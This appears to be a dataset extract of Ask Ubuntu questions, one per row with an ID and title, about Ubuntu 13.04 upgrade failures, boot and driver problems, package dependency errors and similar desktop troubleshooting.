287340	i ca n't upgrade to raring ringtail ; is it because of the traffic ?	i received a message this morning announcing that the new ubuntu raring ringtail 13.04 is now available . i had to use the computer for something pretty urgent so i told ubuntu to ask me to upgrade later . after my business was over , i tried to find a way to bring back that upgrade window . i tried restarting but it did n't seem to reappear . so i went to my settings , opened up `` about this computer '' and clicked on `` install updates '' ... but it did n't work . i tried it multiple times but it always shows an error message : `` make sure you are connected to the internet '' ; but my internet works fine -- i can surf , watch and all that on my computer ... but not upgrade , for some reason ! is it because there is a lot of traffic on the download server or something ? i would love to upgrade as soon as possible ! thanks in advance for your timely response !
287341	software `` qucs '' could not be installed on 13.04 ; but could be installed on 12.04 by apt-get	unfortunately the package `` qucs '' which could be installed on ubuntu 12.04 , got the following error and could not be installed on ubuntu 13.04 . package qucs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'qucs ' has no installation candidate i tried apt-get update too ; but that did not solve the error .
287348	how to uninstall livecom	i use outlook.com as my primary mail service . after updating ubuntu to raring , i went to check my mail . there was this prompt to install livemail which allows me to get email notifications on desktop . it integrated with mail service and shows up in the mail icon on system bar . problem is , i want to remove it now . i tried synaptics pkg manager and removed all packages which i deemed were related to it . still , there it sits , as if nothing has happened . some help please ? note : please do n't post comments on how i should check something before installing . i liked it but now want to remove it . edit : found the answer ! i searched for all files named similar to livecom and deleted ~/.local/share/applications/livecommaillivecom.desktop which removed the mail icon from my system bar .
287349	burned image file ubutu 12.4.2 for amd64 iso to cd but it wo n't boot	i have a new computer without os . i want to try ubuntu before putting anything else on it . amd athlon ii biostar a780l3c . each time i try to boot with the cd . i get a purple screen with an icon of a control screen = a figure of a man then it goes black with a curser blinking at the upper right hand corner . i have to reboot as no other imput from the keyboard is accepted .
287350	start a new process without blocking the terminal	is it possible to do this ? for example if i run `` gedit tifatul.txt '' via the command line , my terminal becomes blocked and i ca n't enter other command in this terminal before i quit gedit . can i start a program ( like gedit ) without blocking the terminal ? in windows i think this can be done like `` start notepad tifatul.txt ''
287351	operating system not found . error on installing ubuntu 13.04 !	i 'm trying to install ubuntu 13.04 using boot-able usb disk . but it says that operating system not found . and there is n't any problem with the usb disk because it is working well on other machines . i 'm using dell xps 15z .
287352	ubuntu 13.04 installation does not detect windows 7	i am trying to dual boot windows 7 64-bt professional with ubuntu 13.04 64-bit desktop , but the installation ca n't detect my other windows operating system . my laptop is an asus g75vw . it was preinstalled with windows 8 , but i erased everything on my hard drive and installed windows 7 . my boot-info can be found here .
287354	clicking the dash home causes computer to freeze up ?	every time i use the dash home it causes my computer to freeze up and become useless , until i restart it . this issue has plagued me since day 1 of using ubuntu . also , when i first started using ubuntu a few months ago i was using 12.10 , then yesterday i went ahead and upgraded to using 13.04 . but this did n't help at all , and the problem persists .
287358	are there different options for terminal autocomplete ( tab ) behaviour ?	i do n't like my terminal 's autocomplete behaviour , to be honest i like windows ' cmd behaviour better . does bash ( default shell in ubuntu ) come with several options of the autocomplete behaviours ? how can i change it ?
287360	how to solve unmet dependencies ?	i 'm trying to install nitro with this : sudo apt-get install nitro and then i get this : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nitro : depends : gir1.2-launchpad-integration-3.0 but it is not installable e : unable to correct problems , you have held broken packages . how do i solve this ? update the output of cat /etc/apt/sources.list is : # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) ] / raring main restricted deb-src http : //archive.ubuntu.com/ubuntu raring main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //kambing.ui.ac.id/ubuntu/ raring main restricted deb-src http : //kambing.ui.ac.id/ubuntu/ raring multiverse main universe restricted # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //kambing.ui.ac.id/ubuntu/ raring-updates main restricted deb-src http : //kambing.ui.ac.id/ubuntu/ raring-updates multiverse main universe restricted # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //kambing.ui.ac.id/ubuntu/ raring universe deb http : //kambing.ui.ac.id/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //kambing.ui.ac.id/ubuntu/ raring multiverse deb http : //kambing.ui.ac.id/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //kambing.ui.ac.id/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ raring-backports main restricted universe multiverse # added by software-properties deb http : //kambing.ui.ac.id/ubuntu/ raring-security main restricted deb-src http : //kambing.ui.ac.id/ubuntu/ raring-security multiverse main universe restricted # added by software-properties deb http : //kambing.ui.ac.id/ubuntu/ raring-security universe deb http : //kambing.ui.ac.id/ubuntu/ raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main deb http : //repository.spotify.com stable non-free deb-src http : //repository.spotify.com stable non-free and the output of cat /etc/apt/sources.list.d/* is : deb http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu raring main deb-src http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu raring main deb http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu raring main deb-src http : //ppa.launchpad.net/danielrichter2007/grub-customizer/ubuntu raring main deb http : //ppa.launchpad.net/linrunner/tlp/ubuntu raring main deb-src http : //ppa.launchpad.net/linrunner/tlp/ubuntu raring main deb http : //ppa.launchpad.net/linrunner/tlp/ubuntu raring main deb-src http : //ppa.launchpad.net/linrunner/tlp/ubuntu raring main deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/nitro/ubuntu raring main # added by software-center ; credentials stored in /etc/apt/auth.conf deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/nitro/ubuntu raring main # added by software-center ; credentials stored in /etc/apt/auth.conf deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu raring main deb-src http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu raring main
287368	unicode problem in konsole	i have a problem with text encoding in konsole ( i also tried xterm , things are the same ) ( kubuntu 13.04 , kde ) . here is the sample output : oleg @ prizoffn : ~ $ gg gg : \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d\u0430 ( here gg is just random characters , so the answer should be command not supported or something like this ) oleg @ prizoffn : ~ $ sudo apt-get install krusader [ sudo ] password for oleg : ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ... ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ... ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? krusader . ? ? ? ? ? ? ? ? ? 0 , ? ? ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? ? ? ? , ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? , ? 0 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? . oleg @ prizoffn : ~ $ uname -a linux prizoffn 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:16:28 utc 2013 x86_64 x86_64 x86_64 gnu/linux not sure why it is so ... what can be done here ? in the same time , all is working well in pure console mode ( if i press ctrl+alt+f1 ) update : here is useful data : oleg @ prizoffn : ~ $ locale lang=en_us.iso-8859-1 language=en_us : ru : en lc_ctype= '' en_us.iso-8859-1 '' lc_numeric= '' en_us.iso-8859-1 '' lc_time= '' en_us.iso-8859-1 '' lc_collate= '' en_us.iso-8859-1 '' lc_monetary= '' en_us.iso-8859-1 '' lc_messages= '' en_us.iso-8859-1 '' lc_paper= '' en_us.iso-8859-1 '' lc_name= '' en_us.iso-8859-1 '' lc_address= '' en_us.iso-8859-1 '' lc_telephone= '' en_us.iso-8859-1 '' lc_measurement= '' en_us.iso-8859-1 '' lc_identification= '' en_us.iso-8859-1 '' lc_all= update 2 : i was able to restore locale to its normal state by executing lang=en_us.utf8 but this was only temporary result . on konsole restarting locale is set back to its iso-8859-1 value . how can i store this permanently ? i also found this file : oleg @ prizoffn : ~ $ cat .kde/env/setlocale.sh export lang=en_us.utf8 export language=en_us : ru : en where lang was originally set to iso-8859-1 . i changed it to utf8 without any effect . update 3 : after rebooting , locale returned to its normal state . so , no more problems .
287373	ubuntu 13.04 does not boot after i upgrade from ubuntu 12.10	ubuntu 13.04 does n't boot up after i upgrade from 12.10 . i have tried to edit the grub ( nomodeset ) , but it still does n't work . i have a hp pavilion dv6-2153eo pc and a ati radeon graphics card .
287376	no display detected after installing bumblebee on dell xps 15z	so i 've been having quite a bit of issues with ubuntu on this laptop . when i tried to install 12.04 a while ago i never even got the external monitor to work at all and gave up for a few months . so now that 13.04 is out , i tried it , and it works to an extent . i was having this issue where the mouse would have ghost tails coming out of it all the time and tons of other little graphical glitches . so i tried to install bumblebee , and now the external monitor is n't even detected at all . i 'd like some help because after googling forever i ca n't find anyone with a problem specific to mine and the answers never work . thanks .
287377	what is source of local videos for unity video lens ?	i just installed ubuntu 13.04 . i tried to use unity music , photos and video lenses . music and photo lenses does n't show any result . i found that it is because it depends upon rhythmbox and shotwell databases respectively as source , which both i do n't use . but upon opening video lens it shows 6 movies i have locally , but upon typing it does n't show any result not even video it is showing upon just opening that lens.so , what is its source for local video and how does it shows those 6 movies ? those movies are not stored in `` /home/usrname/videos '' directroy and there are many more vidoes stored in that same directory .
287382	a good hex/binary calculator	is there an obvious way of shifting numbers in the gcalc-tool using an operator , such as < < or > > am i missing an obvious shortcut ? say i want to simply perform ( 1 < < 20 ) , how can i do that without the need to shift by 15 and then by 5 using the drop-down buttons ? alternatively , is there a good hex/binary calculator that you would suggest specifically oriented at hex/binary operations ? thanks !
287383	rhythmbox does not remember my music	i am adding my music stored in an ntfs drive into rhythmbox . it stays in the library for that session . however , when i shut down and restart , all imported music is lost from the library ( even after mounting the ntfs drive and opening rhythmbox then ) . the library is not saved and i ca n't make a playlist . is this problem common ? is there a solution to it ?
287393	ubuntu will not boot from my external hard drive	i got a 16gb flash drive and turned it to a bootable usb with pen drive linux using the 13.04 64 bit iso . i then booted from it and went to the setup procedure and installed it on a 500 gb external hard drive with no swap space , it was completely formated . once installed i rebooted to the external hard drive , i waited several minutes only to see no progress and only a blank screen . please help .
287395	ubuntu 13.04 unable to change background images in user mode	i just upgraded to 13.04 this morning . when i signed in for the first time the original background i had used from 12.10 was there but was tiled . so i went to settings appearance and changed the way it was ( stretched / tiled / fit etc . ) normally , at least in 12.10 and prior , as you changed your settings , it would actively preview it behind the appearance screen . my issue is simple . in root user everything works fine . when i click on a default image it applies it to the background . it previews all settings before exiting . and overall is less buggy . in my user login , the new logout / lock screen ( after pressing ctrl+alt+del ) is clear and hard to see . it also has one part of it that is not opaque and just looks bad . i ca n't change the background . i tried these different methods . go to appearance and click on a default image that comes with the distro . no change went online to google images picked one and right clicked - > set as background . no change ubuntu tweak - > love wallpaper hd and clicked on an image . i get a notification on my desktop that says : ubuntu tweak successfully applied background but there is no change . my desktop is black . everything worked prior to upgrade .
287400	ubuntu raid not showing on windows 7	i have windows 7 recently installed on single disk and would like to install games on the slave drives to act faster its a small raid of 2 160gb disks , thing is i have also ubuntu installed there with hours worth of dl 's and would like to keep it , the drive is not usable in windows though i can see it as a blank drive though the device manager , something about the mbr most probably , if i create a partition will i lose the ubuntu data ?
287401	make a bootable usb for ubuntu	i want to run ubuntu from a usb stick . not the installer . the actual os . i want to be able to run ubuntu at home with my drive then go to my friend 's and start it up there and have all my files saved . kind of like a portable computer . i have a mac and a sandisk 16 gb drive . i really want to do this . thanks
287404	why did i get two ubuntu one cloud icons in the tray after the 13.04 upgrade ?	i upgraded to 13.04 , but now i have two ubuntu one cloud icons in my tray . can someone explain why and help me remove one of them ? see what i mean ? edit : the difference is n't so clear as `` general u1 vs. u1music '' for me , but even if it were , why does that require two identical icons ? here are the menu items for my two icons : first : open ubuntu one folder launch ubuntu one website ( greyed out ) synchronization complete ( greyed out ) your files are up to date ( greyed out ) free space : 24.9 gib open control panel ( greyed out ) recently published files disconnect second : ubuntu one ( with an on/off toggle switch ) open ubuntu one open the ubuntu one folder share a file go to the ubuntu one website current and recent transfers get more space get help on the web
287410	ez_setup error while installing gdrivefs	i 'm installing gdrivefs using sudo pip install gdrivefs but receive the error importerror : no module named ez_setup i believe i have all the necessary python modules . can you please suggest some other things for me to try or to check so that i can solve this problem ?
287412	ubuntu 13.04 online accounts	i recently upgraded to ubuntu 13.04 and when setting up the online accounts for face book it said ubuntu would like to post to your friends on your behalf . what does this message mean ?
287413	can i change to lighttpd without problems ?	i 've purchased some new 'cloud hosting space ' with vms running 12.04.2 server . i 'm looking for a lamp stack , but i 'm considering switching out apache for lighttpd - for the speed and resource-usage benefits in the main . before i switch , i wondered how lighttpd runs with php , mysql , and maybe python ? is it fully compatible with wordpress , and other popular php applications ? many thanks in advance for any help
287419	disabling irq # 16 and *bad*gran_size	i upgrade to ubuntu 13.04 and some times appears in boot display a message : disabling irq # 16 when this message appears , i must reboot because the mouse turns very slow and does n't response correctly . i suppose that is a irq conflict problem , but how i can resolve it ? so : 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:16:28 utc 2013 x86_64 x86_64 x86_64 gnu/linux motherboard : ga-h77m-d3h ethernet : realtek semiconductor co. , ltd. rtl8169 pci gigabit ethernet controller ( rev 10 ) news : i removed rtl8169 external ethernet to simplify error possibilities . without this card , i had tested different bios configurations and the result is : disabling irq # 16 appears when i enable `` intel virtualization technology '' in the bios . when i disable the integrated ethernet in the bios , motherboard is freeze in the reboot , when show gigabyte 's logo . i must remove battery for two minutes to restore the bios . other possible symptom i found in dmesg output : a lot of entries with this patter : *bad*gran_size : 64k chunk_size : 16m num_reg : 10 lose cover ram : -8m ... ... ... .. ... ... ... .. a lot of entries with this pattern : [ 0.000000 ] total ram covered : 16302m [ 0.000000 ] gran_size : 64k chunk_size : 64k num_reg : 10 lose cover ram : 246m [ 0.000000 ] gran_size : 64k chunk_size : 128k num_reg : 10 lose cover ram : 246m [ 0.000000 ] gran_size : 64k chunk_size : 256k num_reg : 10 lose cover ram : 246m [ 0.000000 ] gran_size : 64k chunk_size : 512k num_reg : 10 lose cover ram : 246m [ 0.000000 ] gran_size : 64k chunk_size : 1m num_reg : 10 lose cover ram : 246m [ 0.000000 ] gran_size : 64k chunk_size : 2m num_reg : 10 lose cover ram : 246m [ 0.000000 ] gran_size : 64k chunk_size : 4m num_reg : 10 lose cover ram : 246m [ 0.000000 ] gran_size : 64k chunk_size : 8m num_reg : 10 lose cover ram : 246m [ 0.000000 ] *bad*gran_size : 64k chunk_size : 16m num_reg : 10 lose cover ram : -8m [ 0.000000 ] *bad*gran_size : 64k chunk_size : 32m num_reg : 10 lose cover ram : -8m [ 0.000000 ] *bad*gran_size : 64k chunk_size : 64m num_reg : 10 lose cover ram : -8m [ 0.000000 ] gran_size : 64k chunk_size : 128m num_reg : 10 lose cover ram : 0g ... ... ... .. ... ... ... .. other possible error : [ 18.518043 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20121018/utaddress-251 ) [ 18.518048 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 18.518051 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) [ 18.518054 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 18.518056 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \led_ 1 ( 20121018/utaddress-251 ) [ 18.518076 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpio 2 ( 20121018/utaddress-251 ) [ 18.518079 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 18.518080 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich trace how disable irq16 : [ 0.907977 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 0.936700 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 0.936701 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 0.936813 ] hub 1-1:1.0 : usb hub found [ 0.936841 ] hub 1-1:1.0 : 6 ports detected [ 1.048329 ] usb 2-1 : new high-speed usb device number 2 using ehci-pci [ 1.062340 ] irq 16 : nobody cared ( try booting with the `` irqpoll '' option ) [ 1.062342 ] pid : 0 , comm : swapper/4 tainted : gf 3.8.0-19-generic # 29-ubuntu [ 1.062343 ] call trace : [ 1.062344 ] < irq > [ < ffffffff810ecbcd > ] __report_bad_irq+0x3d/0xe0 [ 1.062350 ] [ < ffffffff810ed092 > ] note_interrupt+0x1c2/0x210 [ 1.062353 ] [ < ffffffff815735bb > ] ? cpuidle_wrap_enter+0x5b/0xa0 [ 1.062354 ] [ < ffffffff81572b70 > ] ? centrino_target+0x370/0x370 [ 1.062356 ] [ < ffffffff810ea807 > ] handle_irq_event_percpu+0xa7/0x1f0 [ 1.062357 ] [ < ffffffff81572b70 > ] ? centrino_target+0x370/0x370 [ 1.062359 ] [ < ffffffff810ea99e > ] handle_irq_event+0x4e/0x80 [ 1.062360 ] [ < ffffffff810edbda > ] handle_fasteoi_irq+0x5a/0x100 [ 1.062363 ] [ < ffffffff810164ce > ] handle_irq+0x1e/0x30 [ 1.062366 ] [ < ffffffff816d54aa > ] do_irq+0x5a/0xe0 [ 1.062367 ] [ < ffffffff816cb4ad > ] common_interrupt+0x6d/0x6d [ 1.062368 ] < eoi > [ < ffffffff815735bb > ] ? cpuidle_wrap_enter+0x5b/0xa0 [ 1.062370 ] [ < ffffffff81573610 > ] cpuidle_enter_tk+0x10/0x20 [ 1.062372 ] [ < ffffffff81573205 > ] cpuidle_idle_call+0xa5/0x260 [ 1.062374 ] [ < ffffffff8101d5af > ] cpu_idle+0xaf/0x120 [ 1.062377 ] [ < ffffffff816b4e0e > ] start_secondary+0x1e0/0x1e5 [ 1.062377 ] handlers : [ 1.062380 ] [ < ffffffff814f8cb0 > ] usb_hcd_irq [ 1.062381 ] disabling irq # 16 and this is content of /proc/interrupts when irq16 is no disabled : cpu0 cpu1 cpu2 cpu3 cpu4 cpu5 cpu6 cpu7 0 : 43 0 0 0 0 0 0 0 ir-io-apic-edge timer 1 : 2 0 0 0 0 0 0 0 ir-io-apic-edge i8042 7 : 0 0 0 0 0 0 0 0 ir-io-apic-edge parport0 8 : 0 0 0 0 1 0 0 0 ir-io-apic-edge rtc0 9 : 0 0 0 0 0 0 0 0 ir-io-apic-fasteoi acpi 12 : 3 0 0 0 1 0 0 0 ir-io-apic-edge i8042 16 : 1986 36 308 8342 226 56 8481 154948 ir-io-apic-fasteoi ehci_hcd : usb1 18 : 59 63470 12 29 42 68182 24 31 ir-io-apic-fasteoi eth1 23 : 3724 2201 59 1529 74045 49806 453 19695 ir-io-apic-fasteoi ehci_hcd : usb2 40 : 0 0 0 0 0 0 0 0 dmar_msi-edge dmar0 41 : 0 0 0 0 0 0 0 0 dmar_msi-edge dmar1 42 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge xhci_hcd 43 : 8436 7375 4020 4555 8608 28721 20001 20889 ir-pci-msi-edge ahci 44 : 9 1 0 0 0 4 1 0 ir-pci-msi-edge mei 45 : 625228 20562 17848 17739 58665 42944 36267 32186 ir-pci-msi-edge i915 46 : 159 4 6 6 523 121 1 8 ir-pci-msi-edge snd_hda_intel 47 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0 48 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-0 49 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-1 50 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-2 51 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-3 52 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-4 53 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-5 54 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-6 55 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-7 nmi : 874 766 742 713 293 316 324 345 non-maskable interrupts loc : 759575 759342 748379 849342 210905 248734 229921 283703 local timer interrupts spu : 0 0 0 0 0 0 0 0 spurious interrupts pmi : 874 766 742 713 293 316 324 345 performance monitoring interrupts iwi : 0 0 0 0 0 0 0 0 irq work interrupts rtr : 0 0 0 0 0 0 0 0 apic icr read retries res : 295355 94827 9724 31512 2742 2897 2222 6768 rescheduling interrupts cal : 508 543 499 543 522 540 515 515 function call interrupts tlb : 21058 21800 15397 13086 7965 8805 8672 6416 tlb shootdowns trm : 0 0 0 0 0 0 0 0 thermal event interrupts thr : 0 0 0 0 0 0 0 0 threshold apic interrupts mce : 0 0 0 0 0 0 0 0 machine check exceptions mcp : 38 38 38 38 38 38 38 38 machine check polls err : 0 mis : 0 when irq16 is disabled and mouse does n't response correctly : cpu0 cpu1 cpu2 cpu3 cpu4 cpu5 cpu6 cpu7 0 : 43 0 0 0 0 0 0 0 ir-io-apic-edge timer 1 : 0 0 1 0 1 0 0 0 ir-io-apic-edge i8042 7 : 0 0 0 0 0 0 0 0 ir-io-apic-edge parport0 8 : 0 1 0 0 0 0 0 0 ir-io-apic-edge rtc0 9 : 0 0 0 0 0 0 0 0 ir-io-apic-fasteoi acpi 12 : 2 0 0 0 0 1 0 1 ir-io-apic-edge i8042 16 : 11008 789 530 240 43614 25676 17062 1082 ir-io-apic-fasteoi ehci_hcd : usb1 18 : 1803 4 6 22 2077 8 20 23 ir-io-apic-fasteoi eth1 23 : 207 30 4 16 276 942 34 10 ir-io-apic-fasteoi ehci_hcd : usb2 40 : 0 0 0 0 0 0 0 0 dmar_msi-edge dmar0 41 : 0 0 0 0 0 0 0 0 dmar_msi-edge dmar1 42 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge xhci_hcd 43 : 7502 297 1784 50 1049 1504 9829 57 ir-pci-msi-edge ahci 44 : 5 0 0 0 8 2 0 0 ir-pci-msi-edge mei 45 : 6015 127 371 58 366 170 575 140 ir-pci-msi-edge i915 46 : 134 20 4 3 185 454 23 9 ir-pci-msi-edge snd_hda_intel 47 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0 48 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-0 49 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-1 50 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-2 51 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-3 52 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-4 53 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-5 54 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-6 55 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-7 nmi : 7 4 4 4 6 3 9 1 non-maskable interrupts loc : 9814 7028 5981 6435 7513 4103 9617 3359 local timer interrupts spu : 0 0 0 0 0 0 0 0 spurious interrupts pmi : 7 4 4 4 6 3 9 1 performance monitoring interrupts iwi : 0 0 0 0 0 0 0 0 irq work interrupts rtr : 0 0 0 0 0 0 0 0 apic icr read retries res : 2780 1082 426 299 290 258 308 189 rescheduling interrupts cal : 539 533 548 566 447 560 547 552 function call interrupts tlb : 551 438 367 491 368 553 1703 291 tlb shootdowns trm : 0 0 0 0 0 0 0 0 thermal event interrupts thr : 0 0 0 0 0 0 0 0 threshold apic interrupts mce : 0 0 0 0 0 0 0 0 machine check exceptions mcp : 2 2 2 2 2 2 2 2 machine check polls when irq16 is disabled and mouse responses correctly ( a new status ) : cpu0 cpu1 cpu2 cpu3 cpu4 cpu5 cpu6 cpu7 0 : 22 0 0 0 0 0 0 0 ir-io-apic-edge timer 1 : 1 0 0 0 0 1 0 0 ir-io-apic-edge i8042 7 : 0 0 0 0 0 0 0 0 ir-io-apic-edge parport0 8 : 1 0 0 0 0 0 0 0 ir-io-apic-edge rtc0 9 : 0 0 0 0 0 0 0 0 ir-io-apic-fasteoi acpi 12 : 2 0 0 0 1 0 0 1 ir-io-apic-edge i8042 16 : 44189 20 7 2 44042 10916 697 128 ir-io-apic-fasteoi ehci_hcd : usb1 18 : 69 4 11 8 107 20 14 14 ir-io-apic-fasteoi eth1 19 : 5264 244 939 75 539 567 2995 149 ir-io-apic-fasteoi ata_piix , ata_piix 23 : 340 32 7 2 305 2821 17 13 ir-io-apic-fasteoi ehci_hcd : usb2 40 : 0 0 0 0 0 0 0 0 dmar_msi-edge dmar0 41 : 0 0 0 0 0 0 0 0 dmar_msi-edge dmar1 42 : 14 0 157 14 1 3 698 283 ir-pci-msi-edge xhci_hcd 43 : 9 0 2 0 0 0 4 0 ir-pci-msi-edge mei 44 : 621 119 226 72 101 141 619 116 ir-pci-msi-edge i915 45 : 62 15 152 1 362 143 54 43 ir-pci-msi-edge snd_hda_intel 46 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0 47 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-0 48 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-1 49 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-2 50 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-tr-3 51 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-4 52 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-5 53 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-6 54 : 0 0 0 0 0 0 0 0 ir-pci-msi-edge eth0-r-7 nmi : 7 5 3 3 3 1 3 2 non-maskable interrupts loc : 9085 7261 6749 6803 9853 5303 7399 4982 local timer interrupts spu : 0 0 0 0 0 0 0 0 spurious interrupts pmi : 7 5 3 3 3 1 3 2 performance monitoring interrupts iwi : 0 0 0 0 0 0 0 0 irq work interrupts rtr : 0 0 0 0 0 0 0 0 apic icr read retries res : 1791 870 339 303 245 217 350 211 rescheduling interrupts cal : 489 487 559 563 490 536 567 488 function call interrupts tlb : 435 277 544 370 320 301 685 316 tlb shootdowns trm : 0 0 0 0 0 0 0 0 thermal event interrupts thr : 0 0 0 0 0 0 0 0 threshold apic interrupts mce : 0 0 0 0 0 0 0 0 machine check exceptions mcp : 2 2 2 2 2 2 2 2 machine check polls news : i tested with latest bios . error persists , but minus errors appears in dmesg . for example , *bad*gran_size has been disappear . a curiosity : firmwares files in gigabyte web are .exe ! ! ! ! and the last bios image is 10 months old beta version !
287420	why is my ubuntu diplaying inconsistent version using two different methods ?	i recently updated my ubuntu from 12.10 to 13.04 using commands : sudo apt-get update and upgraded sudo apt-get upgrade after that i did do-release-upgrade -d but after sometime my system froze so i forcefully shut it down without letting it complete the up-gradation process . now , on checking the version from `` about this computer '' and from terminal using command lsb_release -a i get contradicting results .the command says `` ubuntu 13.04 '' whereas gui shows 12.10 . how to fix this ? and more importantly , which among the two is correct ? other problems i face are : sound setting on top is disabled . i am unable to change them .
287423	12.04 , 12.10 - how can i install java 32-bit and java 64-bit ?	i have my project which requires to run with java - 64-bit for the main application . and for some other libraries it requires java - 32-bit version . on 64-bit ubuntu 12.04 when i install java it installs only the follow sun @ sun-m14xr2 : ~/videos $ java -version java version `` 1.7.0_21 '' openjdk runtime environment ( icedtea 2.3.9 ) ( 7u21-2.3.9-0ubuntu0.12.10.1 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) now how i can keep this as it is + separately also install the java - 32 bit ?
287425	13.04 asus ux31e	i just upgraded from 12.10 to 13.04 . now it appears the sound is not working . in the sound settings , the only output available it dummy output . any ideas how to get this working ? installing drivers again etc ? thanks , adam
287426	after upgrading to ubuntu 13.04 from 12.10 , other devices are not able to keep connection with wifi	after i upgraded my laptop to ubuntu 13.04 from 12.10 my other devices are not able to keep connected to wifi . when i connect ubuntu 13.04 with my wifi connection , my other devices galaxy s3 and nexus 7 tablet ca n't keep connection to wifi , it keeps getting disconnected .
287429	ubuntu 13.04 upgrade failed	today i upgraded to 13.04 ( from 12.10 ) and i already regret doing this because while upgrading my whole system froze ( waited for more than 2 hours ) and i had to use a hard shutdown . since that moment everything went wrong . when i restarted the system i could not login ( it would redirect me to the login screen when i logged in ) . so i had to shutdown again , next time i startup , my bootmanager was corrupted so i had to use boot repair to fix it ( here is the log : http : //paste.ubuntu.com/5613074/ ) . now when i startup it can not find my operating system so i think it 's completely messed up . i have a bootable usb ubuntu 13.04 on it , hoping that i could repair my installation ( or re-install ubuntu 13.04 ) but the only choice i have is to overwrite everything . is anything wrong with my current configuration and can i fix it ? can i try to exclude the /home/ partition while installing ( then i would lose less important information ) ? i also tried to copy my home folder to an external hdd , but 